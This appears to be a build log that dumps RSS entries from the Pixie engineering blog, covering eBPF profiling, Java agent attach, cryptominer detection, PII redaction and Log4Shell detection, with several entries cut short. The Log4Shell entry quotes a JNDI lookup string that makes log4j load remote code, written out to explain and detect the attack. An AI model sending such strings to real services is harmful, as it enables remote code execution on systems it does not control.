5:35:42 PM: 'BPF table data reduces the number of expensive system calls." src="sys-call-reduction.png"></svg></div><p>When applied to both data structures, this optimization provided a further 58% reduction (from 0.95% to 0.40%) in CPU utilization. This optimization shows the high cost of making repeated system calls to interact with BPF maps, a lesson we have now taken to heart.</p><h3>Switching from BPF hash map to perf buffer</h3><p>The high costs of accessing the BPF maps repeatedly made us wonder if there was a more efficient way to transfer the stack trace data to user space.</p><p>We realized that by switching the histogram table to a BPF perf buffer (which is essentially a circular buffer), we could avoid the need to clear the stack trace keys from the map <sup id="fnref-3"><a href="#fn-3" class="footnote-ref">3</a></sup>. Perf buffers also allow faster data transfer because they use fewer system calls per readout.</p><p>On the flip side, the BPF maps were performing some amount of stack trace aggregation in kernel space. Since perf buffers report every stack trace without aggregation, this would require us to transfer about twice as much data according to our experiments.</p><p>In the end, it turned out the benefit of the perf buffer’s more efficient transfers (~125x that of hash maps) outweighed the greater volume of data (~2x) we needed to transfer. This optimization further reduced the overhead to about 0.3% CPU utilization.</p><div class="image-xl"><svg title="Switching a BPF hash map to a BPF perf buffer eliminates the need to clear data\n' +

5:35:42 PM: 'and increases the speed of data transfer." src="perf-buffer.png"></svg></div><h3>Conclusion</h3><p>In the process of building a continuous profiler, we learned that the cost of symbolizing and moving stack trace data was far more expensive than the underlying cost of collecting the raw stack trace data.</p><p>Our efforts to optimize these costs led to a 4x reduction (from 1.27% to 0.31%) in CPU overhead -- a level we’re pretty happy with, even if we’re not done optimizing yet.</p><div class="image-l"><svg title="Graph of the incremental improvement in CPU utilization for each optimization." src="optimizations.png"></svg></div><p>The result of all this work is a low overhead continuous profiler that is always running in the Pixie platform. To see this profiler in action, check out the <a href="https://docs.px.dev/tutorials/pixie-101/profiler/">tutorial</a>!</p><h3>Footnotes</h3><div class="footnotes"><hr/><ol><li id="fn-1">Based on the following assumptions: (1) about 3500 CPU instructions executed to collect a stack trace sample, (2) a CPU that processes 1B instructions per se'... 595 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'How we automated Java profiling: in production, without re-deploy',

5:35:42 PM: date: '2022-09-22',

5:35:42 PM: description: 'The Java ecosystem offers many options for profiling Java applications, but what if you want to debug on prod without redeploying? At Pixie…',

5:35:42 PM: url: 'https://blog.px.dev/cpu-profiling-java/',

5:35:42 PM: guid: 'https://blog.px.dev/cpu-profiling-java/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>The Java ecosystem offers many options for profiling Java applications, but what if you want to <strong><em>debug on prod without redeploying?</em></strong></p><p>At Pixie, we’re building an open source platform that makes Kubernetes observability ridiculously easy for developers. Our guiding principles is that you shouldn’t have to instrument, recompile or redeploy your applications in order to observe and debug them.</p><p>Adding Java support to our continuous always-on profiler was no exception; it needed to work out-of-the box, without recompilation or redeployment. But Java’s Just-In-Time compilation makes it challenging to convert captured stack-traces — containing virtual addresses of running processes — into human readable symbols.</p><p>This blog post will describe how our eBPF-based profiling and Java symbolization works under the covers and include some of the insights that we acquired as we built out this feature.</p><h2>How our eBPF-based always-on profiler works</h2><p>The Pixie performance profiler uses an <a href="https://ebpf.io/">eBPF</a> program running in the kernel to periodically sample stack-traces from the running applications. A stack-trace shows a program’s state, i.e. its call stack, at a particular moment in time. By aggregating across many stack trace samples, one can see which portions of a program’s call stack are using the CPU the most.</p><p>When the kernel samples a stack trace, it is a list of instruction pointers in the virtual address space of the relevant process. Symbolization is the task of translating those virtual addresses into human readable symbols, e.g. translating address <code>0x1234abcd</code> into symbol <code>foo()</code>. After moving the stack-traces from their BPF table to our user-space "Pixie edge module,” the stack-traces are then symbolized. Because the stack-traces are sampled by the kernel, they include all running processes -- naturally, including Java.</p><div class="image-xl"><svg title="Pixie’s continuous profiler uses eBPF to sample stack-traces. The stack-trace tables are then pushed to the user space where they are symbolized." src="pixie-profiler-ebpf.png"></svg></div><p>For Java processes, the addresses collected by the stack trace sampler represent the underlying Java application source code that has been JIT’d into native machine code by the JVM <sup id="fnref-1"><a href="#fn-1" class="footnote-ref">1</a></sup>, but symbolization is not straightforward.</p><p>Symbolizers for compiled languages that are not JITed (e.g. C++, Golang) work by finding the debug symbol section in natively compiled binaries and libraries. However this is not available for Java byte code, since the code is not statically mapped into the application's virtual address space. Thus, our original symbolizer could not make sense out of a Java stack-traces (except for parts that are explicitly in the JVM, but these are not usually of interest to application developers).</p><p>To make Java profiling "work,” we needed a new symbolizer. Fortunately, we were able to lean on other open source contributions and the Java ecosystem to easily meet this need. In brief, we use the <a href="https://docs.oracle.com/javase/8/docs/platform/jvmti/jvmti.html">Java Virtual Machine Tool Interface</a> -- the "JVMTI” -- to interact with the JVM running the target Java application. Based on the open source Java "<a href="https://github.com/jvm-profiling-tools/perf-map-agent">perf map agent</a>”, <a href="https://github.com/pixie-io/pixie/blob/main/src/stirling/source_connectors/perf_profiler/java/agent/agent.cc">we wrote our own JVMTI agent</a> that listens to the JVMTI callbacks for <code>CompiledMethodLoad</code> and <code>DynamicCodeGenerated</code> <sup id="fnref-2"><a href="#fn-2" class="footnote-ref">2</a></sup>. Thus, our JVMTI agent writes each Java symbol and its corresponding address range into a symbol file, and by reading this file, the Pixie data collection process (the Pixie Edge Module or "pem”) symbolizes Java stack-traces.</p><div class="image-xl"><svg title="Using a JVMTI agent to extract symbols from JIT’d code in the Java Virtual Machine." src="jvmti-agent.png"></svg></div><h2>JVMTI attach issues in a Kubernetes context</h2><p>To match an address in a stack-trace to a symbol in the underlying application source code, Pixie uses a JVMTI agent. The agent is triggered each time the JVM JITs some application source code into native binary code stored in memory, and it simply writes the symbol and its corresponding virtual address range into a symbol file. But, Pixie promises turn-key automation, so how do we automatically attach a JVMTI agent to a target application process in a Kubernetes cluster?</p><p>Agent attach is well supported by the Java ecosystem. The easiest way to accomplish it is through a command line argument passed to the Java binary at application startup, e.g.:</p><pre><code class="language-bash">java -agentpath:/path/to/agent.so <other java args>\n' +
'</code></pre><p>However, this method requires an application restart which violates our no-redeployment philosophy.</p><p>Fortunately, Java provides a way to dynamically attach JVMTI agents after application startup. One can simply write another Java program, and invoke the attach API:</p><pre><code class="language-java">VirtualMachine vm = VirtualMachine.attach(targetProcessPID);\n' +

5:35:42 PM: 'vm.load(agentFilePath);\n' +

5:35:42 PM: '</code></pre><p>So... either you need your own Java binary (which introduces worries about version and protocol matching) or you can try to use the Java binary in the target container, which may fail if that Java binary does not include the necessary virtual machine libraries.</p><p>But this assumes you can easily access a Java binary compatible with your target process and in the same container namespaces. It would be neat if we could just do whatever the above code snippet does, and it turns out, that is entirely possible: the mechanics of dynamic agent attach require just a little bit of interprocess communication over a Unix domain socket. But, this is where things get a little complicated thanks to Kubernetes and the diversity of application containers.</p><p>To automatically attach a JVMTI agent to a Java process running as a peer in Kubernetes, one needs to be aware of the following issues:</p><ul><li>Different JVM implementations (HotSpot and OpenJ9) have different attach protocols.</li><li>The agent <code>.so</code> file needs to be visible from inside of the target application container.</li><li>The Unix domain socket may need to share the same UID & GID as the target process.</li><li>Different libc implementations (Alpine Linux uses musl, not glibc).</li></ul><p>In more detail, the two prevailing JVM implementations, HotSpot and OpenJ9, have slightly different attach protocols. In each case, a Unix domain socket is created and used to pass messages into the JVM, but the location of the socket file and the specific message protocol differ. In general, it helps to be aware that the target process is fundamentally unaware of the fact that it is running in a container. So, for example, to start the HotSpot attach protocol, one creates a sentinel file and sends SIGQUIT to the target Java process. The sentinel file is, by convention, named <code>/tmp/.attach_pid<PID></code>. The value for <code><PID></code> needs to be found in the <code>PID</code> namespace of the target container, otherwise, the target process assumes it is for a different JVM.</p><p>After notifying the JVM of the attach request and opening a socket to communicate with the JVM, the JVM process needs to be able to find the <code>.so</code> file that contains your JVMTI agent, i.e. so that it can map in the library using dlopen and then invoke the JVMTI method <code>Agent_OnAttach()</code>. For this, the agent <code>.so</code> file needs to be visible inside of the target container’s mount namespace. The upshot of this is simple: we copy our agent library into the target container before starting the attach protocol<sup id="fnref-3"><a href="#fn-3" class="footnote-ref">3</a></sup>.</p><p>Depending on the underlying JVM (HotSpot or OpenJ9) and Java version, the process executing the agent attach protocol may need to assume the UID and GID of the target JVM. For older JVMs running as non-root (a best practice), even a process running as root would have the attach sequence rejected. For OpenJDK/HotSpot v11.0.1 or greater, <a href="https://bugs.openjdk.java.net/browse/JDK-8197387">root is allowed to invoke the attach sequence</a>.</p><p>Knowing all of the above, one might reasonably expect success -- that is, unless the target Java process is running on an Alpine Linux base image which uses <code>musl</code> instead of <code>glibc</code>. To account for the prevalent use of Alpine Linux (and thus <code>musl</code>), the Pixie Java profiler supplies two agent libraries: one built with <code>musl</code> and one with <code>glibc</code>.</p><h2>How we automated agent attach</h2><p>We need to be aware of several facts: the target process is in a peer container, the attach protocol differs by JVM, and the underlying container may have either glibc or musl. After discovering a few of the above issues "the hard way,” we found an excellent open source contribution, namely <a href="https://github.com/apangin/jattach"><code>jattach</code></a>, which inherently handles most of thi'... 2732 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Detecting Monero miners with bpftrace',

5:35:42 PM: date: '2022-02-17',

5:35:42 PM: description: 'Cryptomining is expensive if you have to pay for the equipment and energy. But if you "borrow” those resources, cryptomining switches from…',

5:35:42 PM: url: 'https://blog.px.dev/detect-monero-miners/',

5:35:42 PM: guid: 'https://blog.px.dev/detect-monero-miners/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>Cryptomining is expensive if you have to pay for the equipment and energy. But if you "borrow” those resources, cryptomining switches from marginal returns to entirely profit. This asymmetry is why <a href="https://www.tigera.io/blog/teamtnt-latest-ttps-targeting-kubernetes/">cybercrime groups</a> increasingly focus on\n' +

5:35:42 PM: '<a href="https://www.interpol.int/en/Crimes/Cybercrime/Cryptojacking">cryptojacking</a> – stealing compute time for the purpose of cryptomining – as part of malware deployments.</p><p>Despite a common misconception, <a href="https://bitcoin.org/en/you-need-to-know#:~:text=Bitcoin%20is%20not%20anonymous&amp;text=All%20Bitcoin%20transactions%20are%20stored,transactions%20of%20any%20Bitcoin%20address.&text=This%20is%20one%20reason%20why%20Bitcoin%20addresses%20should%20only%20be%20used%20once.">most cryptocurrencies are not actually anonymous</a>. If these cryptojackers were to mine Bitcoin or Ethereum, their transaction details would be open to the public, making it possible for law enforcement to track them down. Because of this, many cybercriminals opt to mine <a href="https://www.getmonero.org/get-started/what-is-monero/">Monero: a privacy focused cryptocurrency</a> that makes transactions confidential and untraceable.</p><p>In this article we’ll discuss the following:</p><ul><li>Existing methods for detecting cryptojackers</li><li>How to leverage <a href="https://github.com/iovisor/bpftrace">bpftrace</a> to detect Monero miners</li></ul><p><em>Detection scripts and test environment can be <a href="https://github.com/pixie-io/pixie-demos/tree/main/detect-monero-demo">found in this repo</a></em>.</p><h2>Contents</h2><ul><li><a href="#what-happens-during-cryptomining">What happens during cryptomining?</a></li><li><a href="#what-can-we-detect">What signals can we detect?</a></li><li><a href="#detecting-monero-miners">Monero mining signals</a></li><li><a href="#building-our-bpftrace-script">Building our bpftrace script</a><ul><li><a href="#what-is-bpftrace">What is bpftrace?</a></li><li><a href="#test-environment">Test environment</a></li><li><a href="#where-can-we-find-the-data">Where should we trace?</a></li><li><a href="#what-data-do-we-need">What data do we need?</a></li></ul></li></ul><h2>What happens during cryptomining?</h2><p>What happens during cryptomining and why is it important? <a href="https://medium.com/coinmonks/simply-explained-why-is-proof-of-work-required-in-bitcoin-611b143fc3e0">This blog post by Anthony Albertorio</a> provides more detail, but here's what's relevant:</p><p>Miners race to create the next block for the blockchain. The network rewards them with cryptocurrency when they submit a valid block. Each block contains the hash of the previous block (hence the "chain”), the list of transactions, and a Proof of Work (PoW) <sup id="fnref-1"><a href="#fn-1" class="footnote-ref">1</a></sup>. A miner wins when it successfully finds a valid Proof of Work for that list of transactions. <a href="https://youtu.be/9V1bipPkCTU?t=183">The Bitcoin Proof of Work</a> is a string that causes the entire block to hash to a bit-string with a "target” number of leading 0s. </p><div class="image-m"><svg title="Bitcoin Proof of Work" src="btc-pow.png"></svg></div><p>Verifying the proof is computationally easy: you hash the block and verify that the bitstring matches the expected target. Finding the proof is difficult: the only way to discover it is by guessing. When a miner finds a proof, they broadcast the solution to the network of other miners, who quickly verify the solution. Once the solution is accepted, each miner updates their local copy of the blockchain and starts work on the next block. </p><h2>What can we detect?</h2><p>Now that we know how cryptomining works, we can evaluate ways to detect cryptojackers. Note that no matter what we propose below, the landscape will shift and new techniques will be necessary. Attackers adapt to defenses and detections as they confront them in the field.</p><h3>Analyzing binaries</h3><p>Many cryptojackers opt to use open-source mining software without modification. Scanning binaries running on the operating system for common mining software names and signatures of mining software is a simple yet effective barrier.</p><p>🟢 <strong>Pros:</strong> simple to implement, large surface area. </p><p>🔴 <strong>Cons:</strong> easy to bypass with obfuscation of code. Can also be hidden from tools like <code>ps</code> or <code>top</code> using <a href="https://github.com/gianlucaborello/libprocesshider">libprocesshider</a>.</p><h3>Block connections to known IPs</h3><p>Many cryptominers choose to <a href="https://www.investopedia.com/tech/how-choose-cryptocurrency-mining-pool/">contribute to a mining pool</a>, which will require some outgoing network connection to a central location. You can make a blocklist of the top 100 cryptomining pools and block a large portion of miners. </p><p>🟢 <strong>Pros:</strong> simple to implement, large surface area</p><p>🔴 <strong>Cons:</strong> easy to bypass with proxies or by searching for allowed pools</p><h3>Model common network patterns of miners</h3><p>Most miners opt for SSL which means reading the body of messages is impossible, but there are still signatures that exist for the network patterns. <a href="https://jis-eurasipjournals.springeropen.com/articles/10.1186/s13635-021-00126-1">Michele Russo et al. collect network data</a> on these traces and trained an ML classifier to discriminate between normal network patterns and cryptominer network patterns.</p><p>Because the miners must receive block updates from the rest of the network as well as updates from mining pools, they must rely on the network. </p><p>🟢 <strong>Pros:</strong> robust to proxies, miners are guaranteed to leave a trace due to dependence on the network. </p><p>🔴 <strong>Cons:</strong> large upfront investment to collect data and train models. Operational investment to update models with new data after discovery of new attacks. Risk of <a href="https://www.sciencedirect.com/science/article/pii/S1389128621001249">steganographic obfuscation</a> or <a href="https://en.wikipedia.org/wiki/Adversarial_machine_learning">adversarial examples</a>.</p><h3>Model hardware usage patterns of miners</h3><p>Similarly, you can collect data from hardware counters and train a model that discriminates between mining and not-mining use of CPU, GPU, etc., as discussed in <a href="https://arxiv.org/abs/1909.00268">Gangwal et al.</a> and <a href="http://caesar.web.engr.illinois.edu/papers/dime-raid17.pdf">Tahir et al.</a> </p><p>🟢 <strong>Pros:</strong> robust to binary obfuscation</p><p>🔴 <strong>Cons:</strong> large upfront investment to collect data and train models. Operational investment to update models with new data after discovery of new attacks. Risk of <a href="https://www.sciencedirect.com/science/article/pii/S1389128621001249">steganographic obfuscation</a> or <a href="https://en.wikipedia.org/wiki/Adversarial_machine_learning">adversarial examples</a>.</p><h2>Detecting Monero miners</h2><p>We mentioned earlier that cryptojackers opt to mine Monero because of <a href="https://www.getmonero.org/resources/about/">the privacy guarantees</a>. It turns out that Monero’s Proof of Work algorithm, <a href="https://github.com/tevador/RandomX">RandomX</a>, actually leaves behind a detectable trace.</p><p>RandomX adds a layer on top of the Bitcoin PoW. Instead of guessing the "proof string” directly, you need to find a "proof program” in the <a href="https://github.com/tevador/RandomX/blob/master/doc/design.md#21-instruction-set">RandomX instruction set</a> that outputs the "proof string” when run in the RandomX VM. Because every correct length bitstring is a valid program, Monero miners randomly generate "proof programs" and evaluate each in the RandomX VM. </p><div class="image-xl"><svg title="Monero miner Proof of Work" src="xmr-pow.png"></svg></div><p><strong>These RandomX programs are easy to spot.</strong> They leverage a large set of CPU features, some of which are rarely used by other programs. The instruction set <a href="https://github.com/tevador/RandomX/blob/master/doc/design.md#23-registers">attempts to hit many features available on</a> commodity CPUs.\n' +

5:35:42 PM: 'This design decision <a href="https://github.com/tevador/RandomX/blob/master/doc/design.md#1-design-considerations">curtails the effectiveness of GPUS and ASICs</a>, forcing miners to use CPUs.</p><p>One RandomX instruction in particular leaves behind a strong signal in the CPU. <a href="https://github.com/tevador/RandomX/blob/master/doc/specs.md#541-cfround">CFROUND</a> changes the rounding mode for floating point operations. Other programs rarely set this mode. When they do, they rarely toggle this value as much as RandomX does. The main RandomX contributor, <a href="https://github.com/tevador">tevador</a>, created <a href="https://github.com/tevador/randomx-sniffer">randomx-sniffer</a> which looks for programs that change the rounding-mode often on Windows machines. Nothing exists for Linux yet - but we can build this with bpftrace.</p><h2>Building our bpftrace script</h2><p>We want to detect traces of RandomX (the CPU-intensive mining function for Monero) running on a cluster. Specifically, we want to find the forensic trace of RandomX changing the <a href="https://developer.arm.com/documentation/dui0475/k/floating-point-'... 10620 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: "I shouldn't be seeing this: anonymize sensitive data while debugging using NLP",

5:35:42 PM: date: '2022-11-04',

5:35:42 PM: description: "It's 10 pm and you're on-call. A few minutes ago, you received a slack message about performance issues affecting users of your application…",

5:35:42 PM: url: 'https://blog.px.dev/detect-pii/',

5:35:42 PM: guid: 'https://blog.px.dev/detect-pii/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><div class="image-xl"><figure>\n' +

5:35:42 PM: ' <figure class="gatsby-resp-image-figure">\n' +

5:35:42 PM: ' <span class="gatsby-resp-image-wrapper" style="position:relative;display:block;margin-left:auto;margin-right:auto;max-width:1035px">\n' +

5:35:42 PM: ' <span class="gatsby-resp-image-background-image" style="padding-bottom:32.04633204633204%;position:relative;bottom:0;left:0;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABQUlEQVQY0zWRT0/cMBDF8/0/QKUeWolLzy29coCKCxKwouIAgl0ttTchbMiyif/Fdvyr7GWf9GRpRvPezHPVdR3b7ZZxHInzTAiBaZpKLXOaHBBIKTATCMETY6Tve9q2xVpLTIkQI957quA9xlqsVng1EqwlwznHfr/jtR44O5Vc/Rbc/1qhWkvMFiFgjMFm7nZ4rctcpbVmuVoh12tGKRg2Eq8Uxjqk+Mdj0/D15oEvl9d8v1rw7faGi7ouVyyXSzZC8PGypn9+wo3jQXDzKWTeO+yuJ/qpnPL23nL9dMrZ4oRL8Yfzl3MWr3cEKP2NlKimxnbbMj9pTaWNKS4656UUaZ7L6koppJTUf3/SLn5AOtRJhycLCiHomgY1DBxROTdhtSY6V3I4CuYMh2FgPxqMiwetlAoz8gdk08yc5bH/H8Yyxvpt1eRGAAAAAElFTkSuQmCC');background-size:cover;display:block"></span>\n' +

5:35:42 PM: ' <img class="gatsby-resp-image-image" alt="Detect PII in protocol trace data" title="Detect PII in protocol trace data" src="/static/1617ef0ff04a46a3a96d445e9d418aa6/e3189/sample_pii_json.png" srcSet="/static/1617ef0ff04a46a3a96d445e9d418aa6/a2ead/sample_pii_json.png 259w,/static/1617ef0ff04a46a3a96d445e9d418aa6/6b9fd/sample_pii_json.png 518w,/static/1617ef0ff04a46a3a96d445e9d418aa6/e3189/sample_pii_json.png 1035w,/static/1617ef0ff04a46a3a96d445e9d418aa6/44d59/sample_pii_json.png 1553w,/static/1617ef0ff04a46a3a96d445e9d418aa6/a6d66/sample_pii_json.png 2070w,/static/1617ef0ff04a46a3a96d445e9d418aa6/0e89d/sample_pii_json.png 3058w" sizes="(max-width: 1035px) 100vw, 1035px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0" loading="lazy" decoding="async"/>\n' +

5:35:42 PM: ' </span>\n' +

5:35:42 PM: ' <figcaption class="gatsby-resp-image-figcaption">Detect PII in protocol trace data</figcaption>\n' +

5:35:42 PM: ' </figure></figure></div><p>It's 10 pm and you're on-call. A few minutes ago, you received a slack message about performance issues affecting users of your application. You sigh, pour yourself some instant coffee, and start pulling up the logs of your Kubernetes cluster. By chance, you peek at the latest HTTP request coming through - it's a purchase for foot cream. Not only that, but it has the customer's name, email, and IP address written all over it.</p><p><strong>"Ah," you think to yourself. "I probably shouldn't be seeing this."</strong></p><p>How often in your career have you muttered these words? With so much personal data flowing through applications, it can be all too easy to chance upon sensitive information while debugging issues. Some observability tools, like Pixie, enable users to <a href="https://docs.px.dev/reference/admin/deploy-options/#setting-the-data-access-mode">redact data sources they know to be sensitive</a>. Unfortunately, this solution drops entire categories of data, removing information that may be useful for debugging. To prevent privacy leaks while retaining useful information, developers need a system that finds and redacts only the sensitive parts of each data sample.</p><p>Recent breakthroughs in natural language processing (NLP) have made PII detection and redaction in unseen datasets feasible. In this blog post, I present:</p><ul><li><a href="https://huggingface.co/spaces/beki/pii-anonymizer" target="_blank"><b>An interactive demo of a PII anonymizer</b></a></li><li><a href="#introducing-a-new-pii-dataset"><b> A new public PII dataset for structured data</b></a></li><li><a href="#how-was-this-data-generated"><b>Privy, a synthetic PII data generator</b></a></li><li><a href="#benchmarking-existing-pii-classifiers"><b>Benchmarks for off-the-shelf PII classifiers</b></a></li><li><a href="#custom-pii-classifier"><b>Custom PII classifiers for protocol trace data (SQL, JSON etc)</b></a></li></ul><h2>How do I redact PII with Pixie?</h2><p>Pixie is an open source observability tool for Kubernetes applications that uses eBPF to automatically trace application requests, removing the need for manual instrumentation. Pixie supports a <code>PIIRestricted</code> data access mode that redacts a limited number of PII types (IPs, emails, MAC addresses, IMEI, credit cards, IBANs, and SSNs) using rule-based logic. Adding an NLP-based classifier would enable Pixie to detect additional PII like names and addresses. The Pixie project is gauging community interest in this <a href="https://github.com/pixie-io/pixie/issues/623">feature request</a> - feel free to check it out and add comments.</p><h2>Why care about sensitive data?</h2><p>The costs of privacy violations have never been higher. Be it the EU's General Data Protection Regulation or California's California Consumer Privacy Act (CCPA), governments have enacted a flurry of new laws seeking to protect people's privacy by regulating the use of <a href="https://gdpr.eu/eu-gdpr-personal-data/">Personally Identifiable Information (PII)</a>. The GDPR alone charges up to <a href="https://www.aparavi.com/resources-blog/data-compliance-fines-how-much-cost-you">€20 million or 4% of annual global turnover</a> (whichever is greater) for privacy violations. Despite such steep fines, compliance with these laws in the software industry has been spotty at best; privacy breaches abound and <a href="https://www.tessian.com/blog/biggest-gdpr-fines-2020/">companies are paying millions</a> as a result.</p><h2>Use NLP to detect personally identifiable information (PII)</h2><p>With recent advances in deep learning for text classification, developers have gained a promising new tool to detect sensitive data flows in their applications. <a href="https://research.google/pubs/pub46201/">Transformer-based architectures</a> achieve remarkable accuracy for <a href="https://paperswithcode.com/sota/named-entity-recognition-ner-on-ontonotes-v5">Named Entity Recognition (NER) tasks</a> in which models are trained to find geo-political entities, locations, and more in text samples.</p><h3>Why not use a rules based approach?</h3><p>Rule based approaches (including regex) can be helpful for detecting pattern-based PII data such as social security numbers or bank accounts, but they struggle to identify PII that don’t follow clear patterns such as addresses or names, and can be overly sensitive to formatting. For a generalizable PII solution, it is often better to employ machine learning.</p><h3>How do we know it's working?</h3><p>A machine learning system is only <a href="https://research.google/pubs/pub35179/">as accurate as the data it's trained on</a>. To have a good sense of how well a model performs, we need a dataset representative of the real life conditions it will be used in. In our case, we are looking for PII data a developer might encounter while debugging an application, including network data, logs, and protocol traces. Unfortunately, this data is not readily available - because PII is sensitive, public PII datasets are scarce. One option is to train on data leaks, though this data tends to be unlabelled, and is morally questionable to use. The labelled datasets that do exist (including 4-class <a href="https://paperswithcode.com/dataset/conll-2003">Conll</a>, and 18-class <a href="https://catalog.ldc.upenn.edu/LDC2013T19">OntoNotes</a>) consist of news articles and telephone conversations instead of the debugging information we need.</p><h2>Introducing a new PII dataset</h2><p>Due to the lack of public PII datasets for debugging information, I have generated a synthetic dataset that approximates real world data. <strong>To my knowledge, this is the largest, public PII dataset currently available for structured data.</strong> This new, labelled PII dataset consists of protocol traces (<code>JSON, SQL (PostgreSQL, MySQL), HTML, and XML</code>) generated from <a href="https://swagger.io/specification/">OpenAPI specifications</a> and includes <a href="https://github.com/pixie-io/pixie/blob/main/src/datagen/pii/privy/privy/providers/english_us.py">60+ PII types</a>.</p><h3>Download it here</h3><p>The dataset is <a href="https://huggingface.co/datasets/beki/privy">publicly available on huggingface</a>. It contains token-wise labeled samples that can be used to train and evaluate sequence labelling models that detect the exact position of PII entities in text, as I will do <a href="#custom-pii-classifier">later in this article</a>.</p><pre><code class="language-bash"># text, spans\n' +

5:35:42 PM: '{"full_text": "{first_name: Moustafa, sale_id: 235234}", "spans": "[{value: Moustafa, start: 14, end: 21, type: person}]"}\n' +

5:35:42 PM: '</code></pre><p>Each sample was generated from a unique template extracted from a public API.</p><pre><code class="language-bash"># template\n' +

5:35:42 PM: '{"first_name": "{{person}}", "sale_id": "235234"}\n' +

5:35:42 PM: '</code></pre><p>A <a href="https://en.wikipedia.org/wiki/Inside%E2%80%93outside%E2%80%93beginning_(tagging)">BILUO</a> tagged version of this dataset is also provided on huggingface for better compatibility with existing NER pipelines.</p><h3>How was this data generated?</h3><p>This synthetic dataset was generated using <a href="https://github.com/pixie-io/pixie/tree/main/src/datagen/pii/privy">Privy</a>, a tool which parses <a href="https://swagger.io/specification/">OpenAPI specifications</a> and generates synthetic request pay'... 31220 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Did I get owned by Log4Shell?',

5:35:42 PM: date: '2021-12-10',

5:35:42 PM: description: 'Earlier today, news broke about a serious 0-day exploit in the popular Java logging library log4j . The exploit – called Log4Shell…',

5:35:42 PM: url: 'https://blog.px.dev/did-i-get-owned-by-log4shell/',

5:35:42 PM: guid: 'https://blog.px.dev/did-i-get-owned-by-log4shell/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><alert severity="error">Are your <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/#who-is-impacted">services impacted</a> by this exploit? If so, start with the <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/#permanent-mitigation">mitigation</a> first.</alert><p>Earlier today, <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/">news</a> broke about a serious 0-day exploit in the popular Java logging library <code>log4j</code>. The exploit – called <code>Log4Shell</code> – allows remote code execution (RCE) by entering certain strings into the log statement. This can be a serious security vulnerability if a server logs the inputs it receives over a public endpoint.</p><p>In this post, we'll show how we used Pixie to quickly check for <code>Log4Shell</code> attacks in our Kubernetes cluster.</p><h2>How Does Log4Shell Work?</h2><p>In a nutshell, the <code>Log4Shell</code> exploit means that if a string containing a substring of the form <code>${jndi:ldap://1.1.1.1/a}</code> is logged, then you may be exposed to a RCE attack. When this string is logged, <code>log4j</code> will make a request to the IP, and get a reference to a class file which will then get loaded into your Java application with JNDI. This means your Java application could then be used to execute arbitrary code of the attacker's choice.</p><p>Our goal is not to go into too much detail on <code>Log4Shell</code>, since others have already done a great job of that. Instead we're going to focus on how Pixie helped us identify whether we were under attack.</p><p>For more details on <code>Log4Shell</code>, you can check out this blog, which does a good job of explaining the exploit and mitigation: <a href="https://www.lunasec.io/docs/blog/log4j-zero-day">https://www.lunasec.io/docs/blog/log4j-zero-day</a>.</p><h2>Are we being attacked?</h2><p>We don't deploy Java services at Pixie so we were confident that this wasn't an issue for us. But the team was still curious about whether anyone was trying to attack us. Within minutes, a member of our team, James, put out this <a href="https://docs.px.dev/tutorials/pxl-scripts/">PxL script</a> which checks for instances of the <code>Log4Shell</code> exploit:</p><pre><code class="language-python">import px\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Get all HTTP requests automatically traced by Pixie.\n' +

5:35:42 PM: 'df = px.DataFrame('http_events')\n' +

5:35:42 PM: '\n' +

